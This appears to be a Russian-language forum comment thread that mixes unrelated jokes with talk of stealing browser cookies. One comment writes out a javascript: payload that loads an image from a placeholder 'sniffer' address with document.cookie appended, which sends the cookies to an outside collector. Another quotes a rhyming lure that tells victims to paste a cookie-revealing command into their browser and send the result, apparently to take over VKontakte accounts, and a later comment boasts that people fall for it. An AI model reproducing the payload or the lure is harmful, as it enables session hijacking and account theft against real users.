судя по аве отправителя, он все решат грубой силой...наши хакеры настолько суровы, что не ищут XSS...
Я окончательно разочаровалась в жизни. Верить ничему нельзя. Открыла дверь, на которой была надпись "мужчины", а там оказался туалет..
Поправьте если я туплю но с тем кодом ничего нестырить, правильно врод так : javascript:document.write('<script>img = new Image(); img.src = "ваш снифер?"+document.cookie;</script>')
Баста так хитро прищурился на фото и какбэ говорит нам: А шо нам хулиганам надо? Немерянно аккаунтов вконтакте и ваши куки вдобавок, Мы против войны, мы за диалог И если ты лох, открывай брауз и пиши строк: java script:document.write(document.cookie) Если у тебя не кривые руки. И не забудь убрать пробел после жава. Как сделаешь, скопируй текст и отправляй маляву. И будет тебе от пацанов уважуха, На*би, на*би братуху. wot takoe w seti uwidel =)
Признайтесь братцы кто был под именем Вася БАСТА?) Я знаю ты видишь этот пост, ты читаешь его) отзовись а?
ахахаха ведутся! еще как! и принтскрины шлют и старательно переписывают печеньки) смотря чем поманишь)))))) (на принте не я, сразу говорю)))))